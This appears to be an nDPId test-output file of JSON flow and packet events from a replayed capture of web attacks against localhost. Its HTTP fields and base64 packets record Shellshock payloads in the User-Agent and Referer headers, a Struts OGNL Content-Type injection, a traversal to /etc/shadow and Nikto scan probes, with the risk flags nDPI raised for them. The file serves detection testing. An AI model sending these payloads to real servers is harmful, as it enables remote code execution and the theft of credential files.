+01167{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":496,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277466,"flow_last_seen":1576420277466,"flow_idle_time":7560000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277466,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50554,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewcvs.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":497,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277467,"flow_last_seen":1576420277467,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277467,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50556,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":1,"flow_last_seen":1576420277467,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277467,"pkt":"AAAAAAAAAAAAAAAACABFAAEITytAAEAG7MJ\/AAABfwAAAcV8H5BFlnf\/97sS7IAYAED+\/AAAAQEICp1m\/gOdZv4DR0VUIC93ZWxjb21lIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277467,"flow_last_seen":1576420277467,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277467,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50556,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/welcome","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":498,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277469,"flow_last_seen":1576420277469,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277469,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50558,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":498,"flow_packet_id":1,"flow_last_seen":1576420277469,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277469,"pkt":"AAAAAAAAAAAAAAAACABFAAEK4AFAAEAGW+p\/AAABfwAAAcV+H5B29+cpQb7It4AYAED+\/gAAAQEICp1m\/gWdZv4FR0VUIC93aG9pcy5jZ2kgSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQoNCg=="} +01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":498,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277469,"flow_last_seen":1576420277469,"flow_idle_time":7560000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277469,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50558,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/whois.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":499,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277471,"flow_last_seen":1576420277471,"flow_idle_time":7560000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277471,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50560,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":499,"flow_packet_id":1,"flow_last_seen":1576420277471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":271,"pkt_l4_len":237,"thread_ts_msec":1576420277471,"pkt":"AAAAAAAAAAAAAAAACABFAAEB0rpAAEAGaTp\/AAABfwAAAcWAH5AE8+pw+\/3ZB4AYAED+9QAAAQEICp1m\/gedZv4HR0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} 
+01156{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":499,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277471,"flow_last_seen":1576420277471,"flow_idle_time":7560000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277471,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50560,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":500,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277473,"flow_last_seen":1576420277473,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420277473,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50562,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":500,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":500,"flow_packet_id":1,"flow_last_seen":1576420277473,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":245,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":245,"pkt_l4_len":211,"thread_ts_msec":1576420277473,"pkt":"AAAAAAAAAAAAAAAACABFAADnqaNAAEAGkmt\/AAABfwAAAcWCH5DlqJF6VmPeaYAYAED+2wAAAQEICp1m\/gmdZv4JR0VUIC8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvc2hhZG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpkaXNod2FzaGVyKQ0KDQo="} +01109{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":500,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277473,"flow_last_seen":1576420277473,"flow_idle_time":7560000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420277473,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50562,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/shadow","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:dishwasher)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":501,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277474,"flow_last_seen":1576420277474,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":1576420277474,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50564,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":501,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":501,"flow_packet_id":1,"flow_last_seen":1576420277474,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":347,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":347,"pkt_l4_len":313,"thread_ts_msec":1576420277474,"pkt":"AAAAAAAAAAAAAAAACABFAAFN5cZAAEAGVeJ\/AAABfwAAAcWEH5A2eN0dBhBSM4AYAED\/QQAAAQEICp1m\/gqdZv4KR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1UeXBlOiAleyNjb250ZXh0Wydjb20ub3BlbnN5bXBob255Lnh3b3JrMi5kaXNwYXRjaGVyLkh0dHBTZXJ2bGV0UmVzcG9uc2UnXS5hZGRIZWFkZXIoJ05pa3RvLUFkZGVkLUNWRS0yMDE3LTU2MzgnLDcqNil9Lm11bHRpcGFydC9mb3JtLWRhdGENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzdHJ1dHNob2NrKQ0KDQo="} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":501,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277474,"flow_last_seen":1576420277474,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":1576420277474,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50564,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":502,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277477,"flow_last_seen":1576420277477,"flow_idle_time":7560000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420277477,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50566,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":502,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":502,"flow_packet_id":1,"flow_last_seen":1576420277477,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1576420277477,"pkt":"AAAAAAAAAAAAAAAACABFAAFZtP1AAEAGhp9\/AAABfwAAAcWGH5CUg4wjlAViUYAYAED\/TQAAAQEICp1m\/g2dZv4NR0VUIC9pbmRleC5hY3Rpb24gSFRUUC8xLjENCkNvbnRlbnQtVHlwZTogJXsjY29udGV4dFsnY29tLm9wZW5zeW1waG9ueS54d29yazIuZGlzcGF0Y2hlci5IdHRwU2VydmxldFJlc3BvbnNlJ10uYWRkSGVhZGVyKCdOaWt0by1BZGRlZC1DVkUtMjAxNy01NjM4Jyw3KjYpfS5tdWx0aXBhcnQvZm9ybS1kYXRhDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c3RydXRzaG9jaykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":502,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277477,"flow_last_seen":1576420277477,"flow_idle_time":7560000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420277477,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50566,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.action","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277478,"flow_last_seen":1576420277478,"flow_idle_time":7560000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420277478,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50568,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00871{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":503,"flow_packet_id":1,"flow_last_seen":1576420277478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1576420277478,"pkt":"AAAAAAAAAAAAAAAACABFAAFZjkpAAEAGrVJ\/AAABfwAAAcWIH5BLo7aS1iADwIAYAED\/TQAAAQEICp1m\/g6dZv4OR0VUIC9sb2dpbi5hY3Rpb24gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnN0cnV0c2hvY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LVR5cGU6ICV7I2NvbnRleHRbJ2NvbS5vcGVuc3ltcGhvbnkueHdvcmsyLmRpc3BhdGNoZXIuSHR0cFNlcnZsZXRSZXNwb25zZSddLmFkZEhlYWRlcignTmlrdG8tQWRkZWQtQ1ZFLTIwMTctNTYzOCcsNyo2KX0ubXVsdGlwYXJ0L2Zvcm0tZGF0YQ0KDQo="} 
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277478,"flow_last_seen":1576420277478,"flow_idle_time":7560000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420277478,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50568,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.action","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:strutshock)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":504,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277480,"flow_last_seen":1576420277480,"flow_idle_time":7560000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420277480,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50570,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":504,"flow_packet_id":1,"flow_last_seen":1576420277480,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":200,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":200,"pkt_l4_len":166,"thread_ts_msec":1576420277480,"pkt":"AAAAAAAAAAAAAAAACABFAAC6N0ZAAEAGBPZ\/AAABfwAAAcWKH5D5Xg+fNMDiFYAYAED+rgAAAQEICp1m\/hCdZv4QR0VUIC92Mi9fY2F0YWxvZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":504,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277480,"flow_last_seen":1576420277480,"flow_idle_time":7560000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420277480,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50570,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/v2\/_catalog","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277488,"flow_last_seen":1576420277488,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277488,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50572,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":505,"flow_packet_id":1,"flow_last_seen":1576420277488,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277488,"pkt":"AAAAAAAAAAAAAAAACABFAADHoFdAAEAGm9d\/AAABfwAAAcWMH5DDZpiKMo58\/IAYAED+uwAAAQEICp1m\/hidZv4YR0VUIC9jZmFwcG1hbi9pbmRleC5jZm0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxMykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":505,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277488,"flow_last_seen":1576420277488,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277488,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50572,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cfappman\/index.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000013)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":506,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277490,"flow_last_seen":1576420277490,"flow_idle_time":7560000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277490,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50574,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":506,"flow_packet_id":1,"flow_last_seen":1576420277490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277490,"pkt":"AAAAAAAAAAAAAAAACABFAADZlJRAAEAGp4h\/AAABfwAAAcWOH5DTxKxPH2zSx4AYAED+zQAAAQEICp1m\/hqdZv4aR0VUIC9jZmRvY3MvZXhhbXBsZXMvY3ZiZWFucy9iZWFuaW5mby5jZm0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxNCkNCg0K"} 
